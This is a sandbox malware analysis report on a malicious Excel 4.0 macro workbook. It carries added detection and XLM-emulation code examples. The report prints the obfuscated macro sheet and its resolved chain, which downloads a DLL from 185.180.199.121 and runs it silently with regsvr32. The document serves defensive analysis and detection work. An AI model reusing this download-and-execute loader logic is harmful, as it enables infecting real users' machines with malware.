Windows Analysis Report Total_order_details_1231333.xlsb
Overview
General Information
Detection
Score: | 64 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Process Tree |
---|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
Total_order_details_1231333.xlsb | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security | |
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team |
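The rule matches on parent and child image names: an Office binary (here EXCEL.EXE) starting a shell or LOLBin such as regsvr32, which is exactly what the macro's EXEC in the Macro 4.0 Code section produces. The following is an added example written for this page; it is not the Sigma rule's own text and not code from Joe Sandbox. It is a condensed re-implementation of that parent/child logic, extended with a severity bump when regsvr32 or rundll32 is handed a module from a writable or relative path (the case in this report), run over constructed Sysmon-style process-creation events. The EXCEL.EXE path is the one in the report; the regsvr32, splwow64 and WINWORD paths, the command lines other than the first, and all PIDs are assumptions.

```python
import json
import ntpath

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                  "msaccess.exe", "mspub.exe", "visio.exe", "onenote.exe"}
# Child images treated as shells/LOLBins; trimmed to the ones that matter for
# document-borne loaders (the real Sigma rule lists more).
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                  "cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe",
                  "msiexec.exe", "wmic.exe", "certutil.exe", "bitsadmin.exe"}
MODULE_LOADERS = {"regsvr32.exe", "rundll32.exe"}
# Locations an unprivileged Office macro can write to; a module loaded from
# here or via a relative path is far more suspicious than one from System32.
WRITABLE_HINTS = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\", "..\\")

# CONSTRUCTED process-creation events using Sysmon Event ID 1 field names.
# The first mirrors this report's chain (EXCEL.EXE -> regsvr32 -s on the
# relative path the macro downloads to); the others are benign or near-misses.
SAMPLE_EVENTS = r"""
{"ProcessId": 5112, "ParentImage": "C:\\Program Files (x86)\\Microsoft Office\\Office16\\EXCEL.EXE", "Image": "C:\\Windows\\SysWOW64\\regsvr32.exe", "CommandLine": "regsvr32 -s ..\\kdldyeff.dll"}
{"ProcessId": 5120, "ParentImage": "C:\\Program Files (x86)\\Microsoft Office\\Office16\\EXCEL.EXE", "Image": "C:\\Windows\\splwow64.exe", "CommandLine": "C:\\Windows\\splwow64.exe 12288"}
{"ProcessId": 6000, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\regsvr32.exe", "CommandLine": "regsvr32.exe /s C:\\Windows\\System32\\msxml3.dll"}
{"ProcessId": 6120, "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c whoami"}
{"ProcessId": 6200, "ParentImage": "C:\\Program Files (x86)\\Microsoft Office\\Office16\\EXCEL.EXE", "Image": "C:\\Windows\\System32\\regsvr32.exe", "CommandLine": "regsvr32.exe C:\\Windows\\System32\\comctl32.ocx"}
""".strip()


def image_name(path):
    return ntpath.basename(path).lower()


def evaluate_event(event):
    """Return an alert dict for an Office-spawns-shell event, else None."""
    parent, child = image_name(event["ParentImage"]), image_name(event["Image"])
    if parent not in OFFICE_PARENTS or child not in SHELL_CHILDREN:
        return None
    args = [a.strip('"') for a in event["CommandLine"].split()[1:]]
    severity, reasons = "medium", [f"{parent} spawned {child}"]
    if child in MODULE_LOADERS:
        if any(a.lower() in ("/s", "-s") for a in args):
            reasons.append("silent flag")
        modules = [a for a in args if a.lower().endswith((".dll", ".ocx"))]
        if any(h in m.lower() for m in modules for h in WRITABLE_HINTS):
            severity = "high"
            reasons.append(f"module from writable or relative path: {modules}")
    return {"ProcessId": event["ProcessId"], "severity": severity,
            "reason": "; ".join(reasons), "CommandLine": event["CommandLine"]}


def detect(jsonl):
    """Run the rule over newline-delimited JSON events; alerts in input order."""
    alerts = []
    for line in jsonl.splitlines():
        if line.strip():
            alert = evaluate_event(json.loads(line))
            if alert:
                alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a['severity']:6}] pid={a['ProcessId']} {a['reason']} :: {a['CommandLine']}")
```

Only three of the five events alert, and only the first reaches high: the regsvr32 launched by explorer.exe is ignored because the parent is not an Office process, and the Office-launched regsvr32 on a System32 .ocx stays at medium. The relative path `..\kdldyeff.dll` is the discriminating feature, so tune the path hints to your environment rather than the binary list.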
Signature Overview |
---|
Only the evidence type and the number of entries per signature survive in this extract; the matched values are absent. |
Source: | File opened: |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) |
Source: | Section loaded: (Excel loading the URLMON library that the macro's CALL(URLMon, URLDownloadToFileA, ...) requires; see Macro 4.0 Code) |
Document exploit detected (process start blacklist hit) |
Source: | Process created: |
Source: | TCP traffic: (2 entries) |
Source: | TCP traffic detected without corresponding DNS query: (3 entries; the macro connects to 185.180.199.121 by literal IP, see Network Behavior) |
Source: | String found in binary or memory: (158 entries; the matched strings are not present in this extract) |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR: (2 entries) |
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: (3 entries; the CALL, EXEC and HALT formulas are shown under Macro 4.0 Code) |
Source: | Section loaded: |
Source: | Classification label: | mal64.expl.evad.winXLSB@3/9@0/1 |
Source: | File created: (2 entries) |
Source: | File read: |
Source: | Key opened: |
Source: | Process created: (3 entries) |
Source: | Window detected: |
Source: | Initial sample: (5 entries) |
Source: | Key opened: |
Source: | File opened: |
Source: | Process created: |
Source: | Process information set: (39 entries) |
Source: | Binary or memory string: (4 entries) |
Source: | File source: |
Mitre Att&ck Matrix |
---|
The extracted matrix carried the full template of every tactic (including the mobile-only columns) with untriggered techniques mixed in; only the techniques carrying a hit marker are listed here. The marker column reproduces the count suffix as extracted (for example the "21" after Exploitation for Client Execution). |
Tactic | Technique | Marker |
---|---|---|
Execution | Scripting | 1 |
Execution | Exploitation for Client Execution | 21 |
Persistence | DLL Side-Loading | 1 |
Privilege Escalation | Process Injection | 1 |
Privilege Escalation | DLL Side-Loading | 1 |
Defense Evasion | Regsvr32 | 1 |
Defense Evasion | Masquerading | 1 |
Defense Evasion | Disable or Modify Tools | 1 |
Defense Evasion | Process Injection | 1 |
Defense Evasion | Scripting | 1 |
Defense Evasion | DLL Side-Loading | 1 |
Discovery | Security Software Discovery | 1 |
Discovery | File and Directory Discovery | 1 |
Discovery | System Information Discovery | 2 |
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
81 URL entries, all 0% / safe (77 rated by URL Reputation, 4 by Avira URL Cloud); the URL strings themselves are not present in this extract. | 0% | | safe | |
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
100 entries, all Malicious = false; reputation high for 72 and unknown for 28. Names and sources are not present in this extract. | | false | | high / unknown |
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
185.180.199.121 | unknown | Netherlands | 14576 | HOSTING-SOLUTIONSUS | false |
The Malicious flag is the sandbox's reputation verdict for the address, not for the traffic: this is the host the macro downloads sat1_0609_2.dll from (see Macro 4.0 Code), and the Joe Sandbox View section below links it to three other malicious samples. |
General Information |
---|
Joe Sandbox Version: | 32.0.0 Black Diamond |
Analysis ID: | 439079 |
Start date: | 23.06.2021 |
Start time: | 17:14:26 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 13s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | Total_order_details_1231333.xlsb |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of new started processes analysed: | 19 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal64.expl.evad.winXLSB@3/9@0/1 (Joe Sandbox label: score 64, exploit and evasion tags, Windows XLSB sample; then processes/dropped files @ contacted domains/contacted IPs, matching the 9 dropped files, 0 domains and 1 IP listed in this report) |
EGA Information: | Failed |
HDC Information: | Failed |
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
185.180.199.121 | 3 other samples in the Joe Sandbox corpus (names and hashes not present in this extract) | | malicious | | |
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
HOSTING-SOLUTIONSUS | 20 other samples in the Joe Sandbox corpus (names and hashes not present in this extract) | | malicious | | |
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Nine files, matching the dropped-file count in the classification label; all were written by C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE. File names, type strings and content previews are not present in this extract. |
Dropped file 1 |
---|
Category: | dropped |
Size (bytes): | 134914 |
Entropy (8bit): | 5.367820976698576 |
Encrypted: | false |
SSDEEP: | 1536:NcQIKNgeBXA3gBwlpQ9DQW+z7Y34ZliKWXboOidX5E6LWME9:lEQ9DQW+zvXO1 |
MD5: | 59652EDADBC6E26BDF1B1288616DF0F9 |
SHA1: | 68E427BB05F13BAE8F2F6547212302F15F62301E |
SHA-256: | A0C0604D3AEBF53DC7D8F62E689022C1866CC135D11295882B24705A6E9157B0 |
SHA-512: | FA7B8F7801DA6C99579E9D39F698278FBEBB699FCA4E1DBDAE901123E6C73818ECFD61C036F19B5144102000BAC18DBF9628F7EC474D1B9D9352CFC8CF469CFB |
Malicious: | false |
Reputation: | low |
Dropped file 2 |
---|
Category: | dropped |
Size (bytes): | 23989 |
Entropy (8bit): | 7.989754044300238 |
Encrypted: | false |
SSDEEP: | 384:SGjFc9Ll+HCggc/h3GXoQjZVVawDIPsTDGY9R9cNc+3JY0kEtWhfEWa92ppgMoF3:S5plMCgzGoOzVawisTDGY9Rs3JYhEtqy |
MD5: | 839795652A8FE78F26F4D86D757ABDE8 |
SHA1: | 979E5B90C72EA3E5E9D9B506AFDC981BFCA61B60 |
SHA-256: | 1A9EF0E2F66682B532D15457635920067C4F29EF762D2E8A3E0363B4CF39C13E |
SHA-512: | E6D5CB06679832DE768E23EF42B9780E4E8327A057A3EA0A6CD5B76908B210078EF659CA44C8723960AB59A0DB85A052C45E7A29D7FA8A643275BA5F210F6773 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Dropped file 3 |
---|
Category: | dropped |
Size (bytes): | 5744 |
Entropy (8bit): | 7.966496386988271 |
Encrypted: | false |
SSDEEP: | 96:4uJgumnoYk22FLjJq17cpKsv+CHI5BXjI1e+HCLDl3kjH1erj+uYU2:4CgJfkfJA7ixCxqe+GDhkT1erj+uYf |
MD5: | 9AD30E24270C495AE68EAF3A1EEECBFB |
SHA1: | 8642D256E7FFBEF5804A2D2220A1FE475A99DC36 |
SHA-256: | 6D3EAD431ABD110369EFABC6F2E474DC24FA3D7EEC28DE43456407C5BACD6D20 |
SHA-512: | EB156DD0686BAAE4F46B0B0C01838DA7225529D3B31912568D36A1CC07BE006EEAD31F464B0252C3A8471ACA71E86EEE9185FE705ABAE08C56B15C63CC891AD5 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Dropped file 4 |
---|
Category: | dropped |
Size (bytes): | 6177 |
Entropy (8bit): | 7.959095006853368 |
Encrypted: | false |
SSDEEP: | 96:j6KDvZ3QXkQ288GMDBm6hEeWyS8ITRIVg9gPEnbYhbY0Y4pxCpAueydMT1uZMr0a:j6KTV8WBPhqd9qqYTB6peyeT1oMr0a |
MD5: | C7ED6FC355D8632DB1464BE3D56BF5CC |
SHA1: | 615484A338922DDF00B903CFA48060AD60D70207 |
SHA-256: | 26000244FBB0C6B2D76F80166CE85700BC96141C6CD80F8B399CA6F15FE3515C |
SHA-512: | FB4AE09EACD15A4FE778BDF366808C4F9FE403C4054F86704C03C87C7016E7D7A5772677B69064FCB5F1B9345D80C4263A58EA8B5E9CA2B717E24E2B19B85A92 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Dropped file 5 |
---|
Category: | dropped |
Size (bytes): | 956 |
Entropy (8bit): | 7.683552542542939 |
Encrypted: | false |
SSDEEP: | 24:64ZJH5wka2YQydYiFNcincNrtNmt5xx4tRFB:JJH5fYuW5c3wPoFB |
MD5: | 32C83607A5C98C5A634278E5AED3AD61 |
SHA1: | EDE34ADEA53C413C4AC8215EA48F2F2FD59F1362 |
SHA-256: | 4A999E919D85EDD0CD1A772CA3B29F91AEECF77D0BEB11FD1B632B7A8A0686BF |
SHA-512: | AF19A013377F0F7B47E54D99D0AFA222BE46072C47944E8640B09A4993DFDDC906B7C68F7E3DAB5B3F126C9AD1090EADBF17FF7068EE8E360D0EA46811C0DB3C |
Malicious: | false |
Reputation: | low |
Dropped file 6 |
---|
Category: | dropped |
Size (bytes): | 9924 |
Entropy (8bit): | 7.973758306371751 |
Encrypted: | false |
SSDEEP: | 192:soXrzGktAQUkDfw4om9PEK9u27pwnJyV028/tgXEoCWoB:so9G+fnVEYu27OIW/+XEoCWoB |
MD5: | B34FB4F2F0F9E70B72BA3AFD028CD97C |
SHA1: | C6868336F78DEA1E718965DF3341039581DB5B5A |
SHA-256: | 189D420D344A694FD1928ABACBEC94D9F0EF52BE036CEB8144A9D9A6DD14EAEB |
SHA-512: | 4795600917F8A67A6C5CBD5713CAACE74E0483F8E6BB6D98EAB63BF24A0F71E537E7F8ABD26808630B247D454A3F467595C8343EEB4EA98AFAB49D81964158D6 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Dropped file 7 |
---|
Category: | dropped |
Size (bytes): | 80025 |
Entropy (8bit): | 7.896060743310021 |
Encrypted: | false |
SSDEEP: | 1536:zZMVmEKjBX9U8fWGHzDmf5TOlMVGoIahaDHTU6hryF70KiiAeWR:empX9U8fW2XmfU2sTU2yF70KiiW |
MD5: | 4E14AE8B3DDDB0449E20FA26C7934DFB |
SHA1: | AD46975613DAA412CD5555AFCAEFE552E39CB154 |
SHA-256: | F567AF0905B7ADF15ABBC2365C022203D5D2D5A64BCF81F0BFD2A91B46A4C41A |
SHA-512: | 10EB07D041FBDD251D92055721EE1EEBEF51C025E3890A7FE8E74CEF60419403D739D1A7C6DBD33BEA6F60FD36C29A0ED43D62B4C71FDB9D72AE28B2952319E7 |
Malicious: | false |
Note: the ssdeep chunks "lMVGoIahaDHTU6hryF70" and "2sTU2yF70" also occur in the sample's own ssdeep (Static File Info), at the same block size of 1536, so this file very likely shares most of its content with the workbook itself (for example a re-saved or cached copy). |
Dropped file 8 |
---|
Category: | dropped |
Size (bytes): | 22 |
Entropy (8bit): | 2.9808259362290785 |
Encrypted: | false |
SSDEEP: | 3:QAlX0Gn:QKn |
MD5: | 7962B839183642D3CDC2F9CEBDBF85CE |
SHA1: | 2BE8F6F309962ED367866F6E70668508BC814C2D |
SHA-256: | 5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6 |
SHA-512: | 2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342 |
Malicious: | false |
Dropped file 9 |
---|
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.6081032063576088 |
Encrypted: | false |
SSDEEP: | 3:RFXI6dtt:RJ1 |
MD5: | 7AB76C81182111AC93ACF915CA8331D5 |
SHA1: | 68B94B5D4C83A6FB415C8026AF61F3F8745E2559 |
SHA-256: | 6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF |
SHA-512: | A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7 |
Malicious: | true |
Static File Info |
---|
General | |
---|---|
File name: | Total_order_details_1231333.xlsb |
File type: | OpenXML container (ZIP; the content preview begins with the PK signature and [Content_Types].xml). An .xlsb stores its sheets as binary BIFF12 parts inside that ZIP, so text-based grep of the archive does not see the formulas. |
File size: | 64436 |
Entropy (8bit): | 7.870422721255186 |
MD5: | 7a915d04a60c318f37d2586b02587a26 |
SHA1: | 695dc190cd70d39a16a003400581353065f964af |
SHA256: | d8c12fb3fc8f75b90c2a11a84b190c7fb3736f08c78a45ab336bacd39f19d3b9 |
SHA512: | fe910bca6f0542d3d0c8933f927dd992c488d5e5214f8853763f43cf6bfa97b0e1b971b9eb53a65b64db0b6a572c8a1bed943d78a7054b020f13b9a4b966768d |
SSDEEP: | 1536:uj3yHgwWlMVGoIahaDHTU6hryF70liWWGH0AeWj:uj3y02sTU2yF70liWW20a |
File Content Preview: | PK..........!.L.......>.......[Content_Types].xml ...(...........................................................................................................''............................................................................................ |
File Icon |
---|
Icon Hash: | 74f0d0d2c6d6d0f4 |
Static OLE Info |
---|
General | |
---|---|
Document Type: | OpenXML |
Number of OLE Files: | 1 |
OLE File "Total_order_details_1231333.xlsb" |
---|
Indicator values (Summary Info, Application Name, Encrypted Document, Word/Workbook/PowerPoint/Visio/ObjectPool streams, Flash object count, VBA macros) are not present in this extract. Note that the payload is an Excel 4.0 (XLM) macro sheet, not a VBA project, so a "no VBA macros" result on its own would say nothing about this file's behaviour. |
Macro 4.0 Code |
---|
The macro is an Excel 4.0 (XLM) macro sheet, not VBA. Every sensitive string is assembled at run time by concatenating (&) single-letter and short fragments spread over three sheets (Sheet1, Sheet2, before.3.13.47.sheet), so neither the API names, the URL nor the command line exists contiguously in the file. Resolving the references in the dump below gives the following chain (reconstructed from the visible fragments):
- =CALL("URLMon", "URLDownloadToFileA", "JJCCBB", 0, "http://185.180.199.121/sat1_0609_2.dll", "..\kdldyeff.dll", 0, 0): loads urlmon.dll and downloads the second stage to a path relative to EXCEL.EXE's current directory. "JJCCBB" is the CALL type string declaring the return and argument types. "UR" comes from =RIGHT("FDFGFDhfjhjhfjfgjUR",2), the rest of the function name from "LDownlo", "adTo", "FileA".
- =EXEC("regsvr32 -s ..\kdldyeff.dll"): built from "regs", "vr3", ="2 -s " and the same path cell (Sheet1!BH41). regsvr32 with -s loads the DLL and calls its DllRegisterServer export silently; this is the Regsvr32 technique hit in the ATT&CK matrix and the Office-spawns-shell Sigma hit above.
- =HALT()
Fragment mapping: "U","R","L","M","o","n" (URLMon); "J","J","C","C","B","B" (JJCCBB); "ht","tp://","185.180.199.121/sat1_0609_2.","dll" (URL). The =Sheet2!BA14() formula in the dump invokes the macro routine whose first formula sits at Sheet2!BA14.
Partially resolved formula as emitted by the sandbox (only some references were substituted):
CALL(U, Sheet2!AV21&Sheet2!BM28&Sheet2!BK33&Sheet2!AX14, Sheet2!BJ54&Sheet2!BK54&Sheet2!BL54&BD46&BE46&BF46, 0, ht, ..\kdldyeff.dll, 0, 0)
Raw macro sheet dump (comma-separated cells; the non-empty cells are the formulas and the string fragments listed above):
"=CALL(BQ18&Sheet2!BK50&Sheet2!BL50&BD42&BE44&BF44,Sheet2!AV21&Sheet2!BM28&Sheet2!BK33&Sheet2!AX14,Sheet2!BJ54&Sheet2!BK54&Sheet2!BL54&BD46&BE46&BF46,0,BH28&BH29&BH30&BH31,BH41,0,0)",,,,,,,,,,,,,,,,,,,,,,=Sheet2!BA14(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,U,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ht,,,,,,,,,,,,,,,,,,,,,,tp://,,,,,,,,,,,,,,,,,,,,,,185.180.199.121/sat1_0609_2.,,,,,,,,,,,,,,,,,,,,,,dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\kdldyeff.dll,,,,,,,,,,,,,,,,,,M,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,C,B,B,,,,,,,,,,,
,,FileA,,,,,,,,,,,,,,,,,,,,=EXEC(before.3.13.47.sheet!BG59&before.3.13.47.sheet!BG60&before.3.13.47.sheet!BF23&Sheet1!BH41),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,"=RIGHT(""FDFGFDhfjhjhfjfgjUR"",2)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""2 -s """,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,LDownlo,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,adTo,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,R,L,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,J,J,C,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,regs,,,,,,,,,,,,,,,,,vr3,,,,,,
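To recover those strings mechanically rather than by eye, the added example below (written for this page; not code from Joe Sandbox or from the sample) emulates the subset of XLM the macro relies on: sheet-qualified cell references, string literals, the & operator and RIGHT(), with CALL, EXEC and HALT logged instead of executed. The workbook it runs on is constructed from the fragments in the dump: the cell addresses are the ones the formulas reference, but which address holds which fragment, and the start cell Sheet1!BA10, are assumptions. It also shows why a plain string rule for URLDownloadToFileA or regsvr32 misses this file: those names only exist after the formulas run.

```python
import re

# CONSTRUCTED workbook. The fragments are the ones in the report's dump; the
# addresses are those the formulas reference, but their placement on the real
# sheets and the start cell Sheet1!BA10 are assumptions.
WORKBOOK = {
    "Sheet1": {
        "BA10": "=CALL(BQ18&Sheet2!BK50&Sheet2!BL50&BD42&BE44&BF44,"
                "Sheet2!AV21&Sheet2!BM28&Sheet2!BK33&Sheet2!AX14,"
                "Sheet2!BJ54&Sheet2!BK54&Sheet2!BL54&BD46&BE46&BF46,"
                "0,BH28&BH29&BH30&BH31,BH41,0,0)",
        "BA11": "=EXEC(before.3.13.47.sheet!BG59&before.3.13.47.sheet!BG60"
                "&before.3.13.47.sheet!BF23&Sheet1!BH41)",
        "BA12": "=HALT()",
        "BQ18": "U", "BD42": "M", "BE44": "o", "BF44": "n",
        "BD46": "C", "BE46": "B", "BF46": "B",
        "BH28": "ht", "BH29": "tp://", "BH30": "185.180.199.121/sat1_0609_2.",
        "BH31": "dll", "BH41": r"..\kdldyeff.dll",
    },
    "Sheet2": {
        "AV21": '=RIGHT("FDFGFDhfjhjhfjfgjUR",2)',
        "BM28": "LDownlo", "BK33": "adTo", "AX14": "FileA",
        "BK50": "R", "BL50": "L", "BJ54": "J", "BK54": "J", "BL54": "C",
    },
    "before.3.13.47.sheet": {"BG59": "regs", "BG60": "vr3", "BF23": '="2 -s "'},
}

TOKEN = re.compile(r'''\s*(?:
      (?P<str>"(?:[^"]|"")*")                            # "text", "" escapes a quote
    | (?P<num>\d+(?:\.\d+)?)
    | (?P<ref>(?:[A-Za-z0-9_.]+!)?\$?[A-Z]{1,3}\$?\d+)   # [Sheet!]A1
    | (?P<func>[A-Z][A-Z0-9.]*)(?=\()                    # NAME(
    | (?P<op>[&(),])
    )''', re.VERBOSE)


def tokenize(formula):
    tokens, pos = [], 0
    while pos < len(formula):
        m = TOKEN.match(formula, pos)
        if not m:
            raise ValueError(f"cannot tokenize {formula[pos:]!r}")
        tokens.append((m.lastgroup, m.group(m.lastgroup)))
        pos = m.end()
    return tokens


class XLMEmulator:
    """Evaluates just enough XLM to undo string splitting: cell references,
    literals, '&' and RIGHT(); CALL/EXEC/HALT are logged, never executed."""

    def __init__(self, workbook):
        self.wb, self.trace = workbook, []

    def cell(self, sheet, ref):
        ref = ref.replace("$", "")
        if "!" in ref:
            sheet, ref = ref.split("!", 1)
        raw = self.wb.get(sheet, {}).get(ref, "")
        return self.evaluate(sheet, raw[1:]) if str(raw).startswith("=") else raw

    def evaluate(self, sheet, formula):
        toks = tokenize(formula.strip())
        value, i = self._expr(sheet, toks, 0)
        if i != len(toks):
            raise ValueError(f"trailing tokens in {formula!r}")
        return value

    def _expr(self, sheet, toks, i):            # term ('&' term)*
        value, i = self._term(sheet, toks, i)
        while i < len(toks) and toks[i] == ("op", "&"):
            rhs, i = self._term(sheet, toks, i + 1)
            value = str(value) + str(rhs)
        return value, i

    def _term(self, sheet, toks, i):
        kind, text = toks[i]
        if kind == "str":
            return text[1:-1].replace('""', '"'), i + 1
        if kind == "num":
            return (float(text) if "." in text else int(text)), i + 1
        if kind == "ref":
            return self.cell(sheet, text), i + 1
        if kind == "func":
            args, i = [], i + 2                  # skip NAME and '('
            while toks[i] != ("op", ")"):
                arg, i = self._expr(sheet, toks, i)
                args.append(arg)
                i += toks[i] == ("op", ",")      # step over a separator
            return self._apply(text, args), i + 1
        raise ValueError(f"unexpected token {toks[i]}")

    def _apply(self, name, args):
        if name == "RIGHT":
            return str(args[0])[-int(args[1]):]
        self.trace.append((name, args))         # side-effecting XLM call
        return ""


def run_macro(workbook, sheet, start, max_cells=64):
    """Run formula cells downward from `start`, as Excel's XLM interpreter
    does, until HALT() or a non-formula cell; returns the call trace."""
    emu = XLMEmulator(workbook)
    col, row = re.match(r"([A-Z]+)(\d+)$", start).groups()
    for r in range(int(row), int(row) + max_cells):
        raw = workbook[sheet].get(f"{col}{r}", "")
        if not str(raw).startswith("="):
            break
        emu.evaluate(sheet, raw[1:])
        if emu.trace and emu.trace[-1][0] == "HALT":
            break
    return emu.trace


def naive_scan(workbook, needles):
    """What a plain string rule sees: raw cell contents, fragments and all."""
    blob = "\n".join(str(v) for cells in workbook.values() for v in cells.values())
    return [n for n in needles if n.lower() in blob.lower()]


if __name__ == "__main__":
    print("raw string scan finds:", naive_scan(WORKBOOK, ["URLDownloadToFileA", "regsvr32"]))
    for name, args in run_macro(WORKBOOK, "Sheet1", "BA10"):
        print(f"={name}({', '.join(repr(a) for a in args)})")
```

The trace comes out as the three calls listed above with every argument resolved, while the raw scan finds nothing. For real samples the workbook dictionary would be filled from a BIFF12 parser (for example the cell records extracted by an XLSB-aware tool) rather than typed in, and the emulator would need the remaining XLM functions the sample uses; the pattern of evaluating rather than grepping is what carries over.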
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 23, 2021 17:15:23.542834044 CEST | 49735 | 80 | 192.168.2.4 | 185.180.199.121 |
Jun 23, 2021 17:15:26.549690962 CEST | 49735 | 80 | 192.168.2.4 | 185.180.199.121 |
Jun 23, 2021 17:15:32.661571026 CEST | 49735 | 80 | 192.168.2.4 | 185.180.199.121 |
Note: all three packets are outbound from the same source port, about 3 s and then 6 s apart, which is the Windows SYN retransmission schedule, and no packet from 185.180.199.121 appears in the table. This is consistent with the download host not responding during the run (analysis stop reason: Timeout), so the second stage sat1_0609_2.dll was very likely not retrieved in this analysis. |
UDP Packets |
---|
